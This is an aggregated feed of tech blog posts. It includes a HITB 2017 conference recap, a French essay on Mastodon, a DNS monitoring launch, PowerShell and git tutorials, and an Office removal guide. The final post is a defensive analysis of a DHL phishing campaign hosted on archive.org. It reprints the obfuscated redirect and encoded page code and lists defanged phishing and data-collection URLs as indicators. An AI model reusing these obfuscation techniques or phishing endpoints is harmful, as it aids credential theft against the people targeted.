Then, Patrick Wardle presented “OverSight: Exposing Spies on macOS”. Patrick presented a quick talk yesterday in the Commsec track. It was very nice so I expected also some nice content. Today the topic was pieces of malware on OSX that abuse the microphone and webcam. To protect against this, he developed a tool called OverSight. Why bad guys use webcams? To blackmail victims, Why governments use microphone to spy. From a developer point of view, how to access the webcam? Via the avfoundation framework. Sandboxed applications must have specific rights to access the camera (via entitlement ‘com apple.security.device.camera’ but non sandboxed application do not require this entitlement to access the cam. videoSnap is a nice example of avfoundation use. The pending tool is audioSnap for the microphone. The best way to protect your webcam is to put a sticker on it. Note that it is also possible to restrict access to is via file permissions.

What about malware that use mic/cam? (note: the LED will always be on). Patrick reviewed some of them like yesterday:

  • The Hackingteam’s implant
  • Eleanor
  • Mokes
  • FruitFly

To protect against abusive access to the webcam & microphone, Patrick developed a nice tool called OverSight. The version 1.1 was just released with new features (better support for the mic, whitelisting apps which can access resources). The talk ended with a nice case study: Shazam was reported as listening all the time to the mic (even if disabled). This was reported by an OverSight user to Patrick. He decided to have a deeper look. He discovered that it’s not a bug but a feature and contacted Shazam. For performance reasons they use continuous recording on IOS but a shared SDK is used with OSX. Malicious or not? “OFF” means in fact “stop processing the recording” but don’t stop the recording.

Other tools developed by Patrick:

  • KnockKnock
  • BlockBlock
  • RansomWhere (detect encryption of files and high number of created files)

It was a very cool talk with lot of interesting information and tips to protect your OSX computers! [Slides are available here]

The last talk from my list was “Is There a Doctor in The House? Hacking Medical Devices and Healthcare Infrastructure” presented by Anirudh Duggal. Usually, such talks present vulnerabilities around the devices that we can find everywhere in hospitals but the the talk focused on something completely different: The protocol HL7 2.x. Hospitals have: devices (monitors, X-ray, MRI, …), networks, protocols (DICOM, HL7, FHIR, HTTP, FTP) and records (patients). HL7 is a messaging standard used by medical devices to achieve interoperability. Messages may contain patient info (PII), doctor info, patient visit details, allergy & diagnostics. Anirudh reviewed the different types of message that can be exchanged like “RDE” or ” Pharmacy Order Message”. The common attacks are:

  • MITM (everything is in clear text)
  • Message source not validated
  • DoS
  • Fuzzing

This is scaring to see that important information are exchanged with so poor protections. How to improve? According to Anirugh, here are some ideas:

  • Validate messages size
  • Enforce TLS
  • Input sanitization
  • Fault tolerance
  • Anonymization
  • Add consistency checks (checksum)

The future? HL7 will be replaced by FHIR a lightweight HTTP-based API. I learned interesting stuff about this protocol… [Slides are available here]

The closing keynote was given by Natalie Silvanovich working on the Google Project Zero. It was about the Shakra Javascript engine. Natalie reviewed the code and discovered 13 bugs, now fixed. She started the talk with a deep review of the principles of arrays in the Javascript engine. Arrays are very important in JS. There are simple but can quickly become complicate with arrays of arrays of arrays. Example:

var b = [ 1; “bob, {}, new RegExp() ];

The second part of the talk was dedicated to the review of the bug she found during her research time. I was a bit lost (the end of the day and not my preferred topic) but the work performed looked very nice.

The 2017’s edition is now over. Besides the talk, the main room was full of sponsor booths with nice challenges, hackerspaces, etc. A great edition! See you next year I hope!

Hackerspaces

ICS Lab

 

[The post HITB Amsterdam 2017 Day #2 Wrap-Up has been first published on /dev/random]

Frank Goossens: Music from the soul; Kamasi Washington – Truth

Lionel Dricot: Mastodon, le premier réseau social véritablement social ?

$
0
0

Vous avez peut-être entendu parler de Mastodon, ce nouveau réseau social qui fait de la concurrence à Twitter. Ses avantages ? Une limite par post qui passe de 140 à 500 caractères et une approche orientée communauté et respect de l’autre là où Twitter a trop souvent été le terrain de cyber-harcèlements.

Mais une des particularités majeures de Mastodon est la décentralisation : ce n’est pas un seul et unique service appartenant à une entreprise mais bien un réseau, comme le mail.

Si chacun peut en théorie créer son instance Mastodon, la plupart d’entre nous rejoindrons des instances existantes. J’ai personnellement rejoint mamot.fr, l’instance gérée par La Quadrature du Net car j’ai confiance dans la pérennité de l’association, sa compétence technique et, surtout, je suis aligné avec ses valeurs de neutralité et de liberté d’expression. Je recommande également framapiaf.org, qui est administré par Framasoft.

Mais vous trouverez pléthore d’instances : depuis celles des partis pirate français et belge aux instances à thème. Il existe même des instances payantes et, pourquoi pas, il pourrait un jour y avoir des instances avec de la pub.

La beauté de tout ça réside bien entendu dans le choix. Les instances de La Quadrature du Net et de Framasoft sont ouvertes et libres, je conseille donc de faire un petit paiement libre récurrent à l’association de 2€, 5€ ou 10€ par mois, selon vos moyens.

Mastodon est décentralisé ? En fait, il faudrait plutôt parler de “distribué”. Il y’a 5 ans, je dénonçais les problèmes des solutions décentralisées/distribuées. Le principal étant qu’on est soumis au bon vouloir ou aux maladresses de l’administrateur de son instance.

Force est de constater que Mastodon n’a techniquement résolu aucun de ces problèmes. Mais semble créer une belle dynamique communautaire qui fait plaisir à voir. Contrairement à son ancêtre Identi.ca, les instances se sont rapidement multipliées. Les conversations se sont lancées et des usages ont spontanément apparu : accueillir les nouveaux, suivre ceux qui n’ont que peu de followers pour les motiver, discuter de manière transparente des bonnes pratiques à adopter, utilisation d’un CW, Content Warning, masquant les messages potentiellement inappropriés, débats sur les règles de modération.

Toute cette énergie donne l’impression d’un espace à part, d’une liberté de discussion éloignée de l’omniprésente et omnisciente surveillance publicitaire indissociable des outils Facebook, Twitter ou Google.

D’ailleurs, un utilisateur proposait qu’on ne parle pas d’utilisateurs (“users”) pour Mastodon mais bien de personnes (“people”).

Dans un précédent article, je soulignais que les réseaux sociaux sont les prémisses d’une conscience globale de l’humanité. Mais comme le souligne Neil Jomunsi, le media est une part indissociable du message que l’on développe. Veut-on réellement que l’humanité soit représentée par une plateforme publicitaire où l’on cherche à exploiter le temps de cerveau des utilisateurs ?

Mastodon est donc selon moi l’expression d’un réel besoin, d’un manque. Une partie de notre humanité est étouffée par la publicité, la consommation, le conformisme et cherche un espace où s’exprimer.

Mastodon serait-il donc le premier réseau social distribué populaire ? Saura-t-il convaincre les utilisateurs moins techniques et se démarquer pour ne pas être « un énième clone libre » (comme l’est malheureusement Diaspora pour Facebook) ?

Mastodon va-t-il durer ? Tant qu’il y’aura des volontaires pour faire tourner des instances, Mastodon continuera d’exister sans se soucier du cours de la bourse, des gouvernements, des lois d’un pays particuliers ou des desiderata d’investisseurs. On ne peut pas en dire autant de Facebook ou Twitter.

Mais, surtout, il souffle sur Mastodon un vent de fraîche utopie, un air de naïve liberté, un sentiment de collaborative humanité où la qualité des échanges supplante la course à l’audience. C’est bon et ça fait du bien.

N’hésitez pas à nous rejoindre, à lire le mode d’emploi de Funambuline et poster votre premier « toot » présentant vos intérêts. Si vous dîtes que vous venez de ma part ( @ploum@mamot.fr ), je vous « boosterais » (l’équivalent du retweet) et la communauté vous suggérera des personnes à suivre.

Au fond, peu importe que Mastodon soit un succès ou disparaisse dans quelques mois. Nous devons continuons à essayer, à tester, à expérimenter jusqu’à ce que cela fonctionne. Si ce n’est pas Diaspora ou Mastodon, ce sera le prochain. Notre conscience globale, notre expression et nos échanges méritent mieux que d’être de simple encarts entre deux publicités sur une plateforme soumise à des lois sur lesquelles nous n’avons aucune prise.

Mastodon est un réseau social. Twitter et Facebook sont des réseaux publicitaires. Ne nous y trompons plus.

 

Photo par Daniel Mennerich.

Ce texte est a été publié grâce à votre soutien régulier sur Tipeee et sur Paypal. Je suis @ploum, blogueur, écrivain, conférencier et futurologue. Vous pouvez me suivre sur Facebook, Medium ou me contacter.

Ce texte est publié sous la licence CC-By BE.

Mattias Geniar: DNS Spy has launched!

$
0
0

The post DNS Spy has launched! appeared first on ma.ttias.be.

I started to created a DNS monitoring & validation solution called DNS Spy and I'm happy to report: it has launched!

It's been in private beta starting in 2016 and in public beta since March 2017. After almost 6 months of feedback, features and bugfixes, I think it's ready to kick the tires.

What's DNS Spy?

In case you haven't been following me the last few months, here's a quick rundown of DNS Spy.

  • Monitors your domains for any DNS changes
  • Alerts you whenever a record has changed
  • Keeps a detailed history of each DNS record change
  • Notifies you of invalid or RFC-violating DNS configs
  • Rates your DNS configurations with a scoring system
  • Is free for 1 monitored domain
  • Provides a point-in-time back-up of all your DNS records
  • It can verify if all your nameservers are in sync
  • Supports DNS zone transfer (AXFR)

There's many more features, like CNAME resolving, public domain scanning, offline & change notifications, ... that all make DNS Spy what it is: a reliable & stable DNS monitoring solution.

A new look & logo

The beta design of DNS Spy was built using a Font Awesome icon and some copy/paste bootstrap templates, just to validate the idea. I've gotten enough feedback to feel confident that DNS Spy adds actual value, so it was time to make the look & feel match that sentiment.

This was the first design:

Here's the new & improved look.

It's go a brand new look, a custom logo and a way to publicly scan & rate your domain configuration.

Public scoring system

You've probably heard of tools like SSL Labs' test & Security Headers, free webservices that allow you to rate and check your server configurations. Each with focus on their domain.

From now on, DNS Spy also has such a feature.

Above is the DNS Spy scan report for StackOverflow.com, which as a rock solid DNS setup.

We rate things like the connectivity (IPv4 & IPv6, records synced, ...), performance, resilience& security (how many providers, domains, DNSSEC & CAA support, ...) & DNS records (how is SPF/DMARC set up, are your TTLs long enough, do your NS records match your nameservers, ...).

The aim is to have DNS Spy become the SSL Labs of DNS configurations. To make that a continuous improvement, I encourage any feedback from you!

If you're curious how your domain scores, scan it via dnsspy.io.

Help me promote it?

Next up, of course, is promotion. There are a lot of ways to promote a service, and advertising is surely going to be one of them.

But if you've used DNS Spy and like it or if you've scanned your domain and are proud of your results, feel free to spread word of DNS Spy to your friends, coworkers, online followers, ... You'd have my eternal gratitude! :-)

DNS Spy is available on dnsspy.io or via @dnsspy on Twitter.

The post DNS Spy has launched! appeared first on ma.ttias.be.

Xavier Mertens: [SANS ISC] Hunting for Malicious Excel Sheets

$
0
0

I published the following diary on isc.sans.org: “Hunting for Malicious Excel Sheets“.

Recently, I found a malicious Excel sheet which contained a VBA macro. One particularity of this file was that useful information was stored in cells. The VBA macro read and used them to download the malicious PE file. The Excel file looked classic, asking the user to enable macros… [Read more]

[The post [SANS ISC] Hunting for Malicious Excel Sheets has been first published on /dev/random]


Jan De Dobbeleer: Cover all the things

$
0
0

This is one which has been on my list for a while. Coming from writing C# and being used to existing tooling and integrations with popular platforms to display information about your code, I kind of miss that when writing PowerShell. One of those is code coverage uploading and displaying on Coveralls.io. Not just because it’s cool, but it allows you to add that information to your repository and enforces you to either keep the current number or improve it. But, as it seems I once said something about not bitching and getting shit done, let’s fix that, shall we?

"You should get your work done instead of bitching about it" - another great quote from @Jan_Joris
I can only subscribe and say amem

— Jønatas C D (@JonatasCD) March 8, 2017

PowerShell has an awesome testing tool called Pester, if you’ve never used it, make sure to check it out. Pester had the ability to check for code coverage out of the box. It will list all lines within the specified files which have been hit, how many times they’ve been hit and what never got hit. Using this information, we can format that to send it to Coveralls for displaying. As I know everyone loves a bit of simplicity, I created a module called Coveralls that allows you to take advantage of this logic and use it wherever you’d like. In my case, I added it to the testing logic for modules on AppVeyor, so that the coverage is updated every time the code is tested on master. To do this you need to add a few lines to your appveyor.yml file.

First off, we need a key to push the results to Coveralls. Make sure to create a secure variable using the Coveralls API token for your repository.

environment:
    CA_KEY:
      secure: yyBVxcqc8JCSyOJf5I8ufwmwjkgMxouJ1ZyuCkAXdffDDU2VfZCZHK9lkHeph3SM

Secondly, we need to resolve a few dependencies.

before_test:
  - ps: Set-PSRepository -Name PSGallery -InstallationPolicy Trusted
  - ps: Install-Module Coveralls -MinimumVersion 1.0.5 -Scope CurrentUser
  - ps: Import-Module Coveralls

It could be you’ll also need the nuget provider, if you’d see an error indicating this, just prepend - ps: Get-PackageProvider -Name Nuget -Force to the before_test section.

Lastly, we need to format and publish the results.

test_script:
  - ps: $coverageResult = Format-Coverage -Include @('Helpers\PoshGit.ps1','Helpers\Prompt.ps1','install.ps1') -CoverallsApiToken $ENV:CA_KEY -BranchName $ENV:APPVEYOR_REPO_BRANCH
  - ps: Publish-Coverage -Coverage $coverageResult

There’s just one caveat here. As Keith Dahlby found out when we added this to posh-git, secure variables do not work on pull requests. This is done to avoid anyone decrypting and displaying that value and run away with your online identity, maybe ending up dating your wife and feeding your kids (the bastards!). As we don’t want that, make sure you either check you have a value in $ENV:CA_KEY and replace it with dummy info if not or don’t build on PR’s.

This example is coming from my oh-my-posh repository, where you can already see a neat Coveralls badge displaying the, somewhat disappointing, code coverage percentage. You can find more info about the module when you visit the project on GitHub. And yes, I do see the irony in having a module about code coverage with 0 tests and no lovely badge. It’s on my list, ok? Don’t be a dick about it.

Source code

Jan De Dobbeleer: Patch me up sir!

$
0
0

We’ve all been there, working on code and forgetting about source control for a few hours. In my case, this resulted in crappy, way too large commits once I was happy with the result. In the best possible outcome, I could split the changes into multiple commits when the changes span across different files, but most of the time that’s not really the case.

It wasn’t until a while back that I figured out git has a way of dealing with that. All this time I thought I simply sucked at source control and would never be able to master that craft on top of all the other skills. No. In fact, it’s completely normal to forget about source control during programming and git can help you sort stuff once you’re done being awesome. But how? Meet patch mode. In this example, we’ll have a look at git add -p, but know that patch mode exists on a multitude of commands, not just add. I’ll come back to that later, but let’s start by looking add -p first.

As I said, we start off by having a lot of files and changes that, if we want to do the right thing, should be split into different commits. The problem isn’t that we have multiple files, the problem is that we have a set of changes within 1 or more files which belong together. So, we need a way to split those files and keep some changes as modified, and stage others.

When we type git add -p, git will present us with something that looks familiar and other stuff that looks rather unfamiliar if you’ve never been here before.

PS> git add -p

diff --git a/_posts/2017-03-16-cover-all-the-things.md b/_posts/2017-03-16-cover-all-the-things.md
index 4b3185c..646c9e0 100644
--- a/_posts/2017-03-16-cover-all-the-things.md
+++ b/_posts/2017-03-16-cover-all-the-things.md
@@ -35,6 +35,9 @@ Lastly, we need to format and publish the results.

 ...

+Look, I'm new here
+I'm new here too
+
 ...
\ No newline at end of file
Stage this hunk [y,n,q,a,d,/,s,e,?]?

The first part of this output looks like a diff, but we do see something else at the end. git talks about a hunk. If you change more than one line in a file, and provided they are more than a few lines apart, git will already split your file into multiple hunks. At the bottom, you can see git presents us with a few options. I’ll only cover the ones I use the most, as those will also be the ones you’ll be using the most. There’s no need in complicating things 😊. You can type ? to get a bit more information about every option.

y - stage this hunk
n - do not stage this hunk
q - quit; do not stage this hunk or any of the remaining ones
a - stage this hunk and all later hunks in the file
d - do not stage this hunk or any of the later hunks in the file
s - split the current hunk into smaller hunks
e - manually edit the current hunk
? - print help

y and n are rather straightforward, we either chose to stage this hunk or not. q will get you back to your safe zone if you came here by accident. a can be used to stage this hunk and all the remaining hunks in the same file. d is like a, only that it won’t stage this hunk or any remaining ones for that file. Quite boring you say? Yup, but we’ve reached the interesting part. Suppose the hunk you see before you contains changes you want to stage, but also a few lines you’d rather not stage right now. You could try to let git split the hunk for you using s, but that won’t always work. When the lines are too close together, git will just repeat the same hunk over and over when trying to split it. In that case you want to use e and manually edit the diff. And that’s an important concept. You will edit the diff, not the file itself.

Try pressing e and your editor will pop up containing the diff for the selected hunk. There’s also a nice little companion text to guide you through this feature.

# Manual hunk edit mode -- see bottom for a quick guide.
@@ -35,6 +35,9 @@ Lastly, we need to format and publish the results.
 
 ...
 
+Look, I'm new here
+I'm new here too
+
...
\ No newline at end of file
# ---
# To remove '-' lines, make them ' ' lines (context).
# To remove '+' lines, delete them.
# Lines starting with # will be removed.
# 
# If the patch applies cleanly, the edited hunk will immediately be
# marked for staging.
# If it does not apply cleanly, you will be given an opportunity to
# edit again.  If all lines of the hunk are removed, then the edit is
# aborted and the hunk is left unchanged.

In the example above, two lines were added to the file. It displays two options depending on what you want to do. In case it’s a removal, you have to replace the - with a space. That might seem straightforward but I’ve seen many people (including me at first) mess this up. Leave the line as is and just replace - with a blank space. That’s all. In case we have an addition, lines starting with +, you simply need to delete the entire line to not stage that change. Remember, we are not editing the file itself, only the diff, implying, on our filesystem, the file will still contain all the changes. We will simply tell git which changes to stage and prepare for a commit. So, after the edit, you’ll end up with this, if you wish to only keep the first line.

...
 
+Look, I'm new here
...

In case you mess up, git will not apply the patch and tell you. You can either quit or modify the diff again to fix that.

Now, I said in the beginning that add is not the only command where you can use this mode. You can make use of this on commit, checkout, reset and stash. As it’s a powerful feature and also iterates through every change you made, I use this all the time to review my changes and create nice, clean, contextual commits. It’s almost like a second nature to simply use git commit -p -m 'Some new code' instead of adding every file separately or worry about my changes along the way. I can keep on coding and when I’m happy with the result I’ll make sure to create an impeccable git log.

Are there any GUI’s out there who support this, you ask? Sure, GitHub for Desktop allows you to stage individual lines, which is exactly what git add -p allows you to do. The ever so awesome GitKraken displays hunks when you click on modified files, where you can also add line per line. When it comes to git and GUI tools, I usually can’t recommend anything useful that won’t create even more confusion. That is, until GitKraken came along. You still need to know what it’s all about, and no GUI can help you with that, but given that it uses the correct naming for its actions, that’s the one I recommend if you’re looking for a GUI tool to manage your git repos.

Now go out and have fun creating clean commits!

Claudio Ramirez: MS Office 365 (Click-to-Run): Remove unused applications

$
0
0

Too many MS Office 365 appsUpdate 20160421:
– update for MS Office 2016.
– fix configuration.xml view on WordPress.

If you install Microsoft Office trough click-to-run you’ll end with the full suite installed. You can no longer select what application you want to install. That’s kind of OK because you pay for the complete suit. Or at least the organisation (school, work, etc.) offering the subscription does. But maybe you are like me and you dislike installing applications you don’t use. Or even more like me: you’re a Linux user with a Windows VM you boot once in a while out of necessity. And unused applications in a VM residing on your disk is *really* annoying.

The Microsoft documentation to remove the unused applications (Access as a DB? Yeah, right…) wasn’t very straightforward so I post what worked for me after the needed trial-and-error routines. This is a small howto:

    • Install the Office Deployment Toolkit (download for MS Office 20132016). The installer asks for a installation location. I put it in C:\Users\nxadm\OfficeDeployTool (change the username accordingly). If you’re short on space (or in a VM), you can put it in a mounted shared.
    • Create a configuration.xml with the applications you want to add. The file should reside in the directory you chose for the Office Deployment Tookit (e.g. C:\Users\nxadm\OfficeDeployTool\configuration.xml) or you should refer to the file with its full path name. You can find the full list op AppIDs here (more info about other settings)/ Add or remove ExcludeApps as desired.  My configuration file is as follows (wordpress removes the xml code below, hence the image):
      configuration.xml
    • If you run the 64-bit Office version change OfficeClientEdition="32" to OfficeClientEdition="64".
    • Download the office components. Type in a cmd box:
      C:\Users\\OfficeDeployTool>setup.exe /download configuration.xml
    • Remove the unwanted applications:
      C:\Users\\OfficeDeployTool>setup.exe /configure configuration.xml
    • Delete (if you want) the Office Deployment Toolkit directory. Certainly the cached installation files in the “Office” directory take a lot of space.

    Enjoy the space and faster updates. If you are using a VM don’t forget to defragment and compact the Virtual Hard Disk to reclaim the space.


    Filed under: Uncategorized Tagged: Click-to-Run, MS Office 365, VirtualBox, vm, VMWare, Windows

    Xavier Mertens: [SANS ISC] DNS Query Length… Because Size Does Matter

    $
    0
    0

    I published the following diary on isc.sans.org: “DNS Query Length… Because Size Does Matter“.

    In many cases, DNS remains a goldmine to detect potentially malicious activity. DNS can be used in multiple ways to bypass security controls. DNS tunnelling is a common way to establish connections with remote systems. It is often based on “TXT” records used to deliver the encoded payload. “TXT” records are also used for good reasons, like delivering SPF records but, too many TXT DNS request could mean that something weird is happening on your network… [Read more]

    [The post [SANS ISC] DNS Query Length… Because Size Does Matter has been first published on /dev/random]

    Xavier Mertens: Archive.org Abused to Deliver Phishing Pages

    $
    0
    0

    The Internet Archive is a well-known website and more precisely for its “WaybackMachine” service. It allows you to search for and display old versions of websites. The current Alexa ranking is 262 which makes it a “popular and trusted” website. Indeed, like I explained in a recent SANS ISC diary, whitelists of websites are very important for attackers! The phishing attempt that I detected was also using the URL shortener bit.ly (Position 9380 in the Alexa list).

    The phishing is based on a DHL notification email. The mail has a PDF attached to it:

    DHL Notification

    This PDF has no malicious content and is therefore not blocked by antispam/antivirus. The link “Click here” points to a bit.ly short URL:

    hxxps://bitly.com/2jXl8GJ

    Note that HTTPS is used which already make the traffic non-inspected by many security solutions.


    Tip: If you append a “+” at the end of the URL, bit.ly will not directly redirect you to the hidden URL but will display you an information page where you can read this URL!


    The URL behind the short URL is:

    hxxps://archive.org/download/gxzdhsh/gxzdhsh.html

    Bit.ly also maintains statistics about the visitors:

    bit.ly Statistics

    It’s impressive to see how many people visited the malicious link. The phishing campaign was also active since the end of March. Thank you bit.ly for this useful information!

    This URL returns the following HTML code:

    <html>
    <head>
    <title></title>
    <META http-equiv="refresh" content="0;URL=data:text/html;base64, ... (base64 data) ... "</head>
    <body bgcolor="#fffff">
    <center>
    </center>
    </body>
    </html>

    The refresh META tag displays the decoded HTML code:

    <script language="Javascript">
    document.write(unescape('%0A%3C%68%74%6D%6C%20%68%6F%6C%61%5F%65%78%74%5F%69%6E%6A%65%63
    %74%3D%22%69%6E%69%74%65%64%22%3E%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D
    %65%71%75%69%76%3D%22%63%6F%6E%74%65%6E%74%2D%74%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D
    %22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%77%69%6E%64%6F%77%73%2D%31
    %32%35%32%22%3E%0A%3C%6C%69%6E%6B%20%72%65%6C%3D%22%73%68%6F%72%74%63%75%74%20%69%63%6F
    %6E%22%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%68%6C%2E%63%6F%6D%2F%69
    %6D%67%2F%66%61%76%69%63%6F%6E%2E%67%69%6
    ...
    %3E%0A%09%3C%69%6D%67%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%66%65%64%61%67
    %72%6F%6C%74%64%2E%63%6F%6D%2F%6D%6F%62%2F%44%48%4C%5F%66%69%6C%65%73%2F%61%6C%69%62%61
    %62%61%2E%70%6E%67%22%20%68%65%69%67%68%74%3D%22%32%37%22%20%0A%0A%77%69%64%74%68%3D%22
    %31%33%30%22%3E%0A%09%3C%2F%74%64%3E%0A%0A%09%3C%2F%74%72%3E%3C%2F%74%62%6F%64%79%3E%3C
    %2F%74%61%62%6C%65%3E%3C%2F%74%64%3E%3C%2F%74%72%3E%0A%0A%0A%0A%0A%3C%74%72%3E%3C%74%64
    %20%68%65%69%67%68%74%3D%22%35%25%22%20%62%67%63%6F%6C%6F%72%3D%22%23%30%30%30%30%30%30
    %22%3E%0A%3C%2F%74%64%3E%3C%2F%74%72%3E%0A%0A%3C%2F%74%62%6F%64%79%3E%3C%2F%74%61%62%6C
    %65%3E%0A%0A%0A%0A%3C%2F%62%6F%64%79%3E%3C%2F%68%74%6D%6C%3E'));
    </Script>

    The deobfuscated script displays the following page:

    DHL Phishing Page

    The pictures are stored on a remote website but it has already been cleaned:

    hxxp://www.fedagroltd.com/mob/DHL_files/

    Stolen data are sent to another website: (This one is still alive)

    hxxp://www.magnacartapeace.org.ng/wp/stevedhl/kenbeet.php

    The question is: how this phishing page was stored on archive.org? If you visit the upper level on the malicious URL (https://archive.org/download/gxzdhsh/), you find this:

    archive.org Files

    Go again to the upper directory (‘../’) and you will find the owner of this page: alextray. This guy has many phishing pages available:

    alextray's Projects

    Indeed, the Internet Archives website allows registered users to upload content as stated in the FAQ. If you search for ‘archive.org/download’ on Google, you will find a lot of references to multiple contents (most of them are harmless) but on VT, there are references to malicious content hosted on archive.org.

    Here is the list of phishing sites hosted by “alextray”. You can use them as IOC’s:

    hxxps://archive.org/download/gjvkrduef/gjvkrduef.html
    hxxps://archive.org/download/Jfojasfkjafkj/jfojas;fkj;afkj;.html
    hxxps://archive.org/download/ygluiigii/ygluiigii.html (Yahoo!)
    hxxps://archive.org/download/ugjufhugyj/ugjufhugyj.html (Microsoft)
    hxxps://archive.org/download/khgjfhfdh/khgjfhfdh.html (DHL)
    hxxps://archive.org/download/iojopkok/iojopkok.html (Adobe)
    hxxps://archive.org/download/Lkmpk/lkm[pk[.html (Microsoft)
    hxxps://archive.org/download/vhjjjkgkgk/vhjjjkgkgk.html (TNT)
    hxxps://archive.org/download/ukryjfdjhy/ukryjfdjhy.html (TNT)
    hxxps://archive.org/download/ojodvs/ojodvs.html (Adobe)
    hxxps://archive.org/download/sfsgwg/sfsgwg.html (DHL)
    hxxps://archive.org/download/ngmdlxzf/ngmdlxzf.html (Microsoft)
    hxxps://archive.org/download/zvcmxlvm/zvcmxlvm.html (Microsoft)
    hxxps://archive.org/download/ugiutiyiio/ugiutiyiio.html (Yahoo!)
    hxxps://archive.org/download/ufytuyu/ufytuyu.html (Microsoft Excel)
    hxxps://archive.org/download/xgfdhfdh/xgfdhfdh.html (Adobe)
    hxxps://archive.org/download/itiiyiyo/itiiyiyo.html (DHL)
    hxxps://archive.org/download/hgvhghg/hgvhghg.html (Google Drive)
    hxxps://archive.org/download/sagsdg_201701/sagsdg.html (Microsoft)
    hxxps://archive.org/download/bljlol/bljlol.html (Microsoft)
    hxxps://archive.org/download/gxzdhsh/gxzdhsh.html (DHL)
    hxxps://archive.org/download/bygih_201701/bygih.html (DHL)
    hxxps://archive.org/download/bygih/bygih.html (DHL)
    hxxps://archive.org/download/ygi9j9u9/ygi9j9u9.html (Yahoo!)
    hxxps://archive.org/download/78yt88/78yt88.html (Microsoft)
    hxxps://archive.org/download/vfhyfu/vfhyfu.html (Yahoo!)
    hxxps://archive.org/download/yfuyj/yfuyj.html (DHL)
    hxxps://archive.org/download/afegwe/afegwe.html (Microsoft)
    hxxps://archive.org/download/nalxJL/nalxJL.html (DHL)
    hxxps://archive.org/download/jfleg/jfleg.html (DHL)
    hxxps://archive.org/download/yfigio/yfigio.html (Microsoft)
    hxxps://archive.org/download/gjbyk/gjbyk.html (Microsoft)
    hxxps://archive.org/download/nfdnkh/nfdnkh.html (Yahoo!)
    hxxps://archive.org/download/GfhdtYry/gfhdt%20yry.html (Microsoft)
    hxxps://archive.org/download/fhdfxhdh/fhdfxhdh.html (Microsoft)
    hxxps://archive.org/download/iohbo6vu5/iohbo6vu5.html (DHL)
    hxxps://archive.org/download/sgsdgh/sgsdgh.html (Adobe)
    hxxps://archive.org/download/mailiantrewl/mailiantrewl.html (Google)
    hxxps://archive.org/download/ihiyi/ihiyi.html (Microsoft)
    hxxps://archive.org/download/glkgjhtrku/glkgjhtrku.html (Microsoft)
    hxxps://archive.org/download/pn8n8t7r/pn8n8t7r.html (Microsoft)
    hxxps://archive.org/download/aEQWGG/aEQWGG.html (Yahoo!)
    hxxps://archive.org/download/isajcow/isajcow.html (Yahoo!)
    hxxps://archive.org/download/pontiffdata_yahoo_Kfdk/;kfd;k.html (Yahoo!)
    hxxps://archive.org/download/vuivi/vuivi.html (TNT)
    hxxps://archive.org/download/lmmkn/lmmkn.html (Microsoft)
    hxxps://archive.org/download/ksafaF/ksafaF.html (Google)
    hxxps://archive.org/download/fsdgs/fsdgs.html (Microsoft)
    hxxps://archive.org/download/joomlm/joomlm.html (Microsoft)
    hxxps://archive.org/download/rdgdh/rdgdh.html (Adobe)
    hxxps://archive.org/download/pontiffdata_yahoo_Bsga/bsga.html (Microsoft)
    hxxps://archive.org/download/ihgoiybot/ihgoiybot.html (Microsoft)
    hxxps://archive.org/download/dfhrf/dfhrf.html (Microsoft)
    hxxps://archive.org/download/pontiffdata_yahoo_Kgfk_201701/kgfk.html (Microsoft)
    hxxps://archive.org/download/jhlhj/jhlhj.html (Yahoo!)
    hxxps://archive.org/download/pontiffdata_yahoo_Kgfk/kgfk.html (Microsoft)
    hxxps://archive.org/download/pontiffdata_yahoo_Gege/gege.html (Microsoft)
    hxxps://archive.org/download/him8ouh/him8ouh.html (DHL)
    hxxps://archive.org/download/maiikillll/maiikillll.html (Google)
    hxxps://archive.org/download/pontiffdata_yahoo_Mlv/mlv;.html (Microsoft)
    hxxps://archive.org/download/oiopo_201701/oiopo.html (Microsoft)
    hxxps://archive.org/download/ircyily/ircyily.html (Microsoft)
    hxxps://archive.org/download/vuyvii/vuyvii.html (DHL)
    hxxps://archive.org/download/fcvbt_201612/fcvbt.html (Microsoft)
    hxxps://archive.org/download/poksfcps/poksfcps.html (Yahoo!)
    hxxps://archive.org/download/tretr_201612/tretr.html
    hxxps://archive.org/download/eldotrivoloto_201612/eldotrivoloto.html (Microsoft)
    hxxps://archive.org/download/babalito_201612/babalito.html (Microsoft)
    hxxps://archive.org/download/katolito_201612/katolito.html (Microsoft)
    hxxps://archive.org/download/kingshotties_201612/kingshotties.html (Microsoft)
    hxxps://archive.org/download/fcvbt/fcvbt.html (Microsoft)
    hxxps://archive.org/download/vkvkk/vkvkk.html (DHL)
    hxxps://archive.org/download/pontiffdata_yahoo_Vkm/vkm;.html (Microsoft)
    hxxps://archive.org/download/hiluoogi/hiluoogi.html (Microsoft)
    hxxps://archive.org/download/ipiojlj/ipiojlj.html (Microsoft)

    [The post Archive.org Abused to Deliver Phishing Pages has been first published on /dev/random]

    Viewing all 4959 articles
    Browse latest View live